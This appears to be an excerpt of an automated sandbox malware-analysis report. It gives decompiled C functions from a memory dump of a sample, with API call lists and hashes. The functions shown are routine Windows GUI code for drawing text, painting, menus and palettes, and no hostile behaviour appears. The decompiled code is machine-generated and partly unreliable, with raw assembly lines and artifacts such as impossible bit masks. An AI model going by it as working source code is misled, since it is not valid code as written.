                                  					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                  						_t194 =  *0x44fbb4; // 0x2191320
                                  						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
                                  							_t155 =  *0x44fbb4; // 0x2191320
                                  							E0041C0E8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041C0E0( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
                                  						}
                                  					}
                                  					_t117 =  *0x44fbb4; // 0x2191320
                                  					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
                                  					_t199 = E004443D8(_v8);
                                  					_t122 =  *(_v8 + 0x270);
                                  					_t209 = _t199 - _t122;
                                  					if(_t199 != _t122) {
                                  						_t164 = 1;
                                  						E004436B0(_v8, _t122, _t199);
                                  						E00432068(_v8,  *(_v8 + 0x270), _t199, _t209);
                                  						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                  							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                                  						}
                                  						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                  							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                                  						}
                                  						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                                  							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                                  							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                                  						}
                                  					}
                                  					goto L12;
                                  				}
                                  			}


















                                  APIs
                                  • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044410F
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044418B
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 004441BA
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 004441E9
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044420C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f845f4a3e96d8b9981dfebdd96a0ea0194fd2e65796992b25a1065b42e2b506e
                                  • Instruction ID: 31f97fbd89ccbe4e1290d52f4dde787fa5d5a12f7c3929e1dcae4cdaac780257
                                  • Opcode Fuzzy Hash: f845f4a3e96d8b9981dfebdd96a0ea0194fd2e65796992b25a1065b42e2b506e
                                  • Instruction Fuzzy Hash: 1371E434B00104EFDB00DBA9C589BAEB7F5BB89304F6541F5E808EB362C775AE459B44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0043BC24(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				void* _v16;
                                  				struct tagRECT _v32;
                                  				void* _t53;
                                  				int _t63;
                                  				CHAR* _t65;
                                  				void* _t76;
                                  				void* _t78;
                                  				int _t89;
                                  				CHAR* _t91;
                                  				int _t117;
                                  				intOrPtr _t127;
                                  				void* _t139;
                                  				void* _t144;
                                  				char _t153;
                                  
                                  				_t120 = __ecx;
                                  				_t143 = _t144;
                                  				_v16 = 0;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t139 = __eax;
                                  				_t117 = _a4;
                                  				_push(_t144);
                                  				_push(0x43be08);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t144 + 0xffffffe4;
                                  				_t53 = E0043DBBC(__eax);
                                  				_t135 = _t53;
                                  				if(_t53 != 0 && E0043F1F8(_t135) != 0) {
                                  					if((_t117 & 0x00000000) != 0) {
                                  						__eflags = (_t117 & 0x00000002) - 2;
                                  						if((_t117 & 0x00000002) == 2) {
                                  							_t117 = _t117 & 0xfffffffd;
                                  							__eflags = _t117;
                                  						}
                                  					} else {
                                  						_t117 = _t117 & 0xffffffff | 0x00000002;
                                  					}
                                  					_t117 = _t117 | 0x00020000;
                                  				}
                                  				E00403EA8( &_v16, _v12);
                                  				if((_t117 & 0x00000004) == 0) {
                                  					L12:
                                  					E0040421C(_v16, 0x43be2c);
                                  					if(_t153 != 0) {
                                  						E0041C7E8( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                  						__eflags =  *((char*)(_t139 + 0x3a));
                                  						if( *((char*)(_t139 + 0x3a)) != 0) {
                                  							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                                  							__eflags = E0041C1C0( *((intOrPtr*)(_v8 + 0xc))) |  *0x43be30;
                                  							E0041C1CC( *((intOrPtr*)(_v8 + 0xc)), E0041C1C0( *((intOrPtr*)(_v8 + 0xc))) |  *0x43be30, _t136, _t139, _t143);
                                  						}
                                  						__eflags =  *((char*)(_t139 + 0x39));
                                  						if( *((char*)(_t139 + 0x39)) != 0) {
                                  							L24:
                                  							_t63 = E004040D0(_v16);
                                  							_t65 = E004042D0(_v16);
                                  							DrawTextA(E0041CD58(_v8), _t65, _t63, _a12, _t117);
                                  							L25:
                                  							_pop(_t127);
                                  							 *[fs:eax] = _t127;
                                  							_push(0x43be0f);
                                  							return E00403E10( &_v16);
                                  						} else {
                                  							__eflags = _a8;
                                  							if(_a8 == 0) {
                                  								OffsetRect(_a12, 1, 1);
                                  								E0041BF00( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                  								_t89 = E004040D0(_v16);
                                  								_t91 = E004042D0(_v16);
                                  								DrawTextA(E0041CD58(_v8), _t91, _t89, _a12, _t117);
                                  								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                  							}
                                  							__eflags = _a8;
                                  							if(_a8 == 0) {
                                  								L23:
                                  								E0041BF00( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
                                  							} else {
                                  								_t76 = E0041BA40(0xff00000d);
                                  								_t78 = E0041BA40(0xff000010);
                                  								__eflags = _t76 - _t78;
                                  								if(_t76 != _t78) {
                                  									goto L23;
                                  								}
                                  								E0041BF00( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                  							}
                                  							goto L24;
                                  						}
                                  					}
                                  					if((_t117 & 0x00000004) == 0) {
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_v32.top = _v32.top + 4;
                                  						DrawEdge(E0041CD58(_v8),  &_v32, 6, 2);
                                  					}
                                  					goto L25;
                                  				} else {
                                  					if(_v16 == 0) {
                                  						L11:
                                  						E004040D8( &_v16, 0x43be20);
                                  						goto L12;
                                  					}
                                  					if( *_v16 != 0x26) {
                                  						goto L12;
                                  					}
                                  					_t153 =  *((char*)(_v16 + 1));
                                  					if(_t153 != 0) {
                                  						goto L12;
                                  					}
                                  					goto L11;
                                  				}
                                  			}




















                                  APIs
                                  • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0043BCF3
                                  • OffsetRect.USER32(?,00000001,00000001), ref: 0043BD44
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043BD79
                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 0043BD86
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043BDED
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Draw$OffsetRectText$Edge
                                  • String ID:
                                  • API String ID: 3610532707-0
                                  • Opcode ID: eecb988e9c119212afa5e563ae6a382eee1a8c119e98055a20db531d47a5d918
                                  • Instruction ID: 770d8ba28c4c687157e0b5afbc310096ec3b90bfe142911fd7fff1e70f22e3d7
                                  • Opcode Fuzzy Hash: eecb988e9c119212afa5e563ae6a382eee1a8c119e98055a20db531d47a5d918
                                  • Instruction Fuzzy Hash: 92516370A00608AFDB20EBA9CC86B9E77A5EF49314F14516AFA10E7391C73C9D40879D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00430258(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				int _v16;
                                  				int _v20;
                                  				struct tagPAINTSTRUCT _v84;
                                  				intOrPtr _t55;
                                  				void* _t64;
                                  				struct HDC__* _t75;
                                  				intOrPtr _t84;
                                  				void* _t95;
                                  				void* _t96;
                                  				void* _t98;
                                  				void* _t100;
                                  				void* _t101;
                                  				intOrPtr _t102;
                                  
                                  				_t100 = _t101;
                                  				_t102 = _t101 + 0xffffffb0;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t75 =  *(_v12 + 4);
                                  				if(_t75 == 0) {
                                  					_t75 = BeginPaint(E004325A4(_v8),  &_v84);
                                  				}
                                  				_push(_t100);
                                  				_push(0x430378);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t102;
                                  				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                                  					_v20 = SaveDC(_t75);
                                  					_v16 = 2;
                                  					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                                  					if(_t95 >= 0) {
                                  						_t96 = _t95 + 1;
                                  						_t98 = 0;
                                  						do {
                                  							_t64 = E00413524( *((intOrPtr*)(_v8 + 0x198)), _t98);
                                  							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                                  								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                                  									goto L11;
                                  								} else {
                                  									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                                  									if(_v16 != 1) {
                                  										goto L11;
                                  									}
                                  								}
                                  							} else {
                                  								goto L11;
                                  							}
                                  							goto L12;
                                  							L11:
                                  							_t98 = _t98 + 1;
                                  							_t96 = _t96 - 1;
                                  						} while (_t96 != 0);
                                  					}
                                  					L12:
                                  					if(_v16 != 1) {
                                  						 *((intOrPtr*)( *_v8 + 0xb8))();
                                  					}
                                  					RestoreDC(_t75, _v20);
                                  				} else {
                                  					 *((intOrPtr*)( *_v8 + 0xb8))();
                                  				}
                                  				E004303B0(_v8, 0, _t75);
                                  				_pop(_t84);
                                  				 *[fs:eax] = _t84;
                                  				_push(0x43037f);
                                  				_t55 = _v12;
                                  				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                                  					return EndPaint(E004325A4(_v8),  &_v84);
                                  				}
                                  				return _t55;
                                  			}



















                                  APIs
                                  • BeginPaint.USER32(00000000,?), ref: 0043027E
                                  • SaveDC.GDI32(?), ref: 004302B2
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 00430314
                                  • RestoreDC.GDI32(?,?), ref: 0043033E
                                  • EndPaint.USER32(00000000,?,0043037F), ref: 00430372
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                  • String ID:
                                  • API String ID: 3808407030-0
                                  • Opcode ID: 426f0bc97d995b4f29184d9aeda48a9801961a6e61c348b58cff2bb6961ac1f2
                                  • Instruction ID: 2cbea0fc1a96a17e9753ad3855e5c0c3d90960595657c2e0c385e8d183e91b6b
                                  • Opcode Fuzzy Hash: 426f0bc97d995b4f29184d9aeda48a9801961a6e61c348b58cff2bb6961ac1f2
                                  • Instruction Fuzzy Hash: 91417F70A00204EFC700DF99C895F9EB7F9AF48308F1591AAE9049B362D7799E41CB14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0043BA64(int __eax, void* __edx) {
                                  				signed int _t39;
                                  				signed int _t40;
                                  				intOrPtr _t44;
                                  				int _t46;
                                  				int _t47;
                                  				intOrPtr* _t48;
                                  
                                  				_t18 = __eax;
                                  				_t48 = __eax;
                                  				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                  					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                  						 *((char*)(__eax + 0x74)) = 1;
                                  						return __eax;
                                  					}
                                  					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                  					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                  						return E0043BA64(_t19, __edx);
                                  					}
                                  					_t18 = GetMenuItemCount(E0043BB94(__eax));
                                  					_t47 = _t18;
                                  					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                                  					while(_t47 > 0) {
                                  						_t46 = _t47 - 1;
                                  						_t18 = GetMenuState(E0043BB94(_t48), _t46, 0x400);
                                  						if((_t18 & 0x00000004) == 0) {
                                  							_t18 = RemoveMenu(E0043BB94(_t48), _t46, 0x400);
                                  							_t40 = 1;
                                  						}
                                  						_t47 = _t47 - 1;
                                  					}
                                  					if(_t40 != 0) {
                                  						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                                  							L14:
                                  							E0043B924(_t48);
                                  							L15:
                                  							return  *((intOrPtr*)( *_t48 + 0x3c))();
                                  						}
                                  						_t44 =  *0x43a578; // 0x43a5c4
                                  						if(E00403264( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0043BB94(_t48)) != 0) {
                                  							goto L14;
                                  						} else {
                                  							DestroyMenu( *(_t48 + 0x34));
                                  							 *(_t48 + 0x34) = 0;
                                  							goto L15;
                                  						}
                                  					}
                                  				}
                                  				return _t18;
                                  			}










                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc77e7b606c20dafbaffba304912d57caf067f4ef98f715a41b6e52034405a3f
                                  • Instruction ID: a138e1dd5d0a6c724fdcb838444c9593fe750754abf0e23448e7e5fe295c89ce
                                  • Opcode Fuzzy Hash: bc77e7b606c20dafbaffba304912d57caf067f4ef98f715a41b6e52034405a3f
                                  • Instruction Fuzzy Hash: 1411757170170956DA20BA3A9915B6BB688DF49788F04202BBF159B79BCF3CEC0586DC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044AE64(void* __eax, void* __ecx, struct HWND__** __edx) {
                                  				intOrPtr _t11;
                                  				intOrPtr _t20;
                                  				void* _t30;
                                  				void* _t31;
                                  				void* _t33;
                                  				struct HWND__** _t34;
                                  				struct HWND__* _t35;
                                  				struct HWND__* _t36;
                                  
                                  				_t31 = __ecx;
                                  				_t34 = __edx;
                                  				_t33 = __eax;
                                  				_t30 = 0;
                                  				_t11 =  *((intOrPtr*)(__edx + 4));
                                  				if(_t11 < 0x100 || _t11 > 0x108) {
                                  					L16:
                                  					return _t30;
                                  				} else {
                                  					_t35 = GetCapture();
                                  					if(_t35 != 0) {
                                  						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x44f664 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                  							_t30 = 1;
                                  						}
                                  						goto L16;
                                  					}
                                  					_t36 =  *_t34;
                                  					_t2 = _t33 + 0x44; // 0x0
                                  					_t20 =  *_t2;
                                  					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
                                  						L7:
                                  						if(E00428DD0(_t36, _t31) == 0 && _t36 != 0) {
                                  							_t36 = GetParent(_t36);
                                  							goto L7;
                                  						}
                                  						if(_t36 == 0) {
                                  							_t36 =  *_t34;
                                  						}
                                  						goto L11;
                                  					} else {
                                  						_t36 = E004325A4(_t20);
                                  						L11:
                                  						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                  							_t30 = 1;
                                  						}
                                  						goto L16;
                                  					}
                                  				}
                                  			}












                                  APIs
                                  • GetCapture.USER32 ref: 0044AE87
                                  • SendMessageA.USER32(00000000,-0000BBEE,0044C944,?), ref: 0044AEDB
                                  • GetWindowLongA.USER32 ref: 0044AEEB
                                  • SendMessageA.USER32(00000000,-0000BBEE,0044C944,?), ref: 0044AF0A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: MessageSend$CaptureLongWindow
                                  • String ID:
                                  • API String ID: 1158686931-0
                                  • Opcode ID: bd220cbe231fa97cab9fdf5e378c2613da9bc657ae87be3824c234f9089f1116
                                  • Instruction ID: ef513cd2bc4fcdfa4c64a601a596c04d1988ae277f1372532c10e8b3e33c55ce
                                  • Opcode Fuzzy Hash: bd220cbe231fa97cab9fdf5e378c2613da9bc657ae87be3824c234f9089f1116
                                  • Instruction Fuzzy Hash: 6B1193712842095FE760FA59CD44E5773DC9B18315B21043AFE6AC3342EB2CFC24836A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 22%
                                  			E00433C74(void* __eax) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				intOrPtr* _t14;
                                  				intOrPtr* _t17;
                                  				intOrPtr _t19;
                                  				intOrPtr* _t21;
                                  				intOrPtr* _t26;
                                  				intOrPtr _t37;
                                  				void* _t39;
                                  				intOrPtr _t47;
                                  				void* _t49;
                                  				void* _t51;
                                  				intOrPtr _t52;
                                  
                                  				_t49 = _t51;
                                  				_t52 = _t51 + 0xfffffff4;
                                  				_t39 = __eax;
                                  				if( *((short*)(__eax + 0x68)) == 0xffff) {
                                  					return __eax;
                                  				} else {
                                  					_t14 =  *0x44de70; // 0x44f8f8
                                  					_t17 =  *0x44de70; // 0x44f8f8
                                  					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                                  					_push(_t19);
                                  					L00421A44();
                                  					_v8 = _t19;
                                  					_push(_t49);
                                  					_push(0x433d34);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t52;
                                  					_t21 =  *0x44e0ec; // 0x44fbb4
                                  					E00421A7C(_v8, E00449250( *_t21,  *((short*)(__eax + 0x68))));
                                  					_t26 =  *0x44e0ec; // 0x44fbb4
                                  					E00421A7C(_v8, E00449250( *_t26,  *((short*)(_t39 + 0x68))));
                                  					_push(0);
                                  					_push(0);
                                  					_push(0);
                                  					_push(_v8);
                                  					L00421AC8();
                                  					_push( &_v16);
                                  					_push(0);
                                  					L00421AD8();
                                  					_push(_v12);
                                  					_push(_v16);
                                  					_push(1);
                                  					_push(_v8);
                                  					L00421AC8();
                                  					_pop(_t47);
                                  					 *[fs:eax] = _t47;
                                  					_push(0x433d3b);
                                  					_t37 = _v8;
                                  					_push(_t37);
                                  					L00421A4C();
                                  					return _t37;
                                  				}
                                  			}


















                                  APIs
                                  • 73451AB0.COMCTL32(00000000), ref: 00433CA6
                                    • Part of subcall function 00421A7C: 73452140.COMCTL32(00429F8A,000000FF,00000000,00433CD6,00000000,00433D34,?,00000000), ref: 00421A80
                                  • 73451680.COMCTL32(00429F8A,00000000,00000000,00000000,00000000,00433D34,?,00000000), ref: 00433CFA
                                  • 73451710.COMCTL32(00000000,?,00429F8A,00000000,00000000,00000000,00000000,00433D34,?,00000000), ref: 00433D05
                                  • 73451680.COMCTL32(00429F8A,00000001,?,00433D9D,00000000,?,00429F8A,00000000,00000000,00000000,00000000,00433D34,?,00000000), ref: 00433D18
                                  • 73451F60.COMCTL32(00429F8A,00433D3B,00433D9D,00000000,?,00429F8A,00000000,00000000,00000000,00000000,00433D34,?,00000000), ref: 00433D2E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: 7345173451680$7345171073452140
                                  • String ID:
                                  • API String ID: 821207058-0
                                  • Opcode ID: 9c833fe73ebdf13cb94b6f5bdc1877bd06ebeef86041004fe154490c8890c4d4
                                  • Instruction ID: bc963e7fe8c07e1dfc54649089f76d9c2cb54ca911fcdcb56c2011639fa6014d
                                  • Opcode Fuzzy Hash: 9c833fe73ebdf13cb94b6f5bdc1877bd06ebeef86041004fe154490c8890c4d4
                                  • Instruction Fuzzy Hash: 0F216674740214AFEB00EFA9DC82F6E73F8EB49714F5044A6F904DB2A1D6B99E40C754
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E0041FCD8(struct HPALETTE__* __eax) {
                                  				struct HPALETTE__* _t21;
                                  				char _t28;
                                  				signed int _t30;
                                  				struct HPALETTE__* _t36;
                                  				struct HPALETTE__* _t37;
                                  				struct HDC__* _t38;
                                  				intOrPtr _t39;
                                  
                                  				_t21 = __eax;
                                  				_t36 = __eax;
                                  				_t39 =  *((intOrPtr*)(__eax + 0x28));
                                  				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
                                  					_t22 =  *((intOrPtr*)(_t39 + 0x14));
                                  					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
                                  						E0041E738(_t22);
                                  					}
                                  					_t21 = E0041D834( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
                                  					_t37 = _t21;
                                  					 *(_t39 + 0x10) = _t37;
                                  					if(_t37 == 0) {
                                  						_push(0);
                                  						L004062C0();
                                  						_t21 = E0041D144(_t21);
                                  						_t38 = _t21;
                                  						if( *((char*)(_t39 + 0x71)) != 0) {
                                  							L9:
                                  							_t28 = 1;
                                  						} else {
                                  							_push(0xc);
                                  							_push(_t38);
                                  							L00406058();
                                  							_push(0xe);
                                  							_push(_t38);
                                  							L00406058();
                                  							_t30 = _t21 * _t21;
                                  							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
                                  							if(_t30 < _t21) {
                                  								goto L9;
                                  							} else {
                                  								_t28 = 0;
                                  							}
                                  						}
                                  						 *((char*)(_t39 + 0x71)) = _t28;
                                  						if(_t28 != 0) {
                                  							_t21 = CreateHalftonePalette(_t38);
                                  							 *(_t39 + 0x10) = _t21;
                                  						}
                                  						_push(_t38);
                                  						_push(0);
                                  						L004064F8();
                                  						if( *(_t39 + 0x10) == 0) {
                                  							 *((char*)(_t36 + 0x30)) = 1;
                                  							return _t21;
                                  						}
                                  					}
                                  				}
                                  				return _t21;
                                  			}











                                  APIs
                                  • 72E7AC50.USER32(00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD2E
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD43
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD4D
                                  • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD71
                                  • 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD7C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: B380CreateHalftonePalette
                                  • String ID:
                                  • API String ID: 178651289-0
                                  • Opcode ID: 43e94dcf87bd10a2320dac9477a5928ed2524be052d737dca86fdd28d82a04de
                                  • Instruction ID: 4fc3df88822694d9f9b675b0e4ed27e520da0a8ba98eca0841959ec518dc6fb5
                                  • Opcode Fuzzy Hash: 43e94dcf87bd10a2320dac9477a5928ed2524be052d737dca86fdd28d82a04de
                                  • Instruction Fuzzy Hash: 3B11B4316416999AEB20EF35A8417FF2B90AB05354F44013BFC029A2C1D7B888DAC3A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E004484EC(void* __eax) {
                                  				void* _t16;
                                  				void* _t37;
                                  				void* _t38;
                                  				signed int _t41;
                                  
                                  				_t16 = __eax;
                                  				_t38 = __eax;
                                  				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x44dc1c != 0) {
                                  					_t16 = E00432804(__eax);
                                  					if(_t16 != 0) {
                                  						_t41 = GetWindowLongA(E004325A4(_t38), 0xffffffec);
                                  						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e8)) != 0) {
                                  							if((_t41 & 0x00080000) == 0) {
                                  								SetWindowLongA(E004325A4(_t38), 0xffffffec, _t41 | 0x00080000);
                                  							}
                                  							return  *0x44dc1c(E004325A4(_t38),  *((intOrPtr*)(_t38 + 0x2ec)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x0044DCA0 |  *0x0044DCA8);
                                  						} else {
                                  							SetWindowLongA(E004325A4(_t38), 0xffffffec, _t41 & 0xfff7ffff);
                                  							_push(0x485);
                                  							_push(0);
                                  							_push(0);
                                  							_t37 = E004325A4(_t38);
                                  							_push(_t37);
                                  							L004064D0();
                                  							return _t37;
                                  						}
                                  					}
                                  				}
                                  				return _t16;
                                  			}








                                  APIs
                                  • GetWindowLongA.USER32 ref: 00448520
                                  • SetWindowLongA.USER32 ref: 00448552
                                  • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004460E0), ref: 0044858C
                                  • SetWindowLongA.USER32 ref: 004485A5
                                  • 72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004460E0), ref: 004485BB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
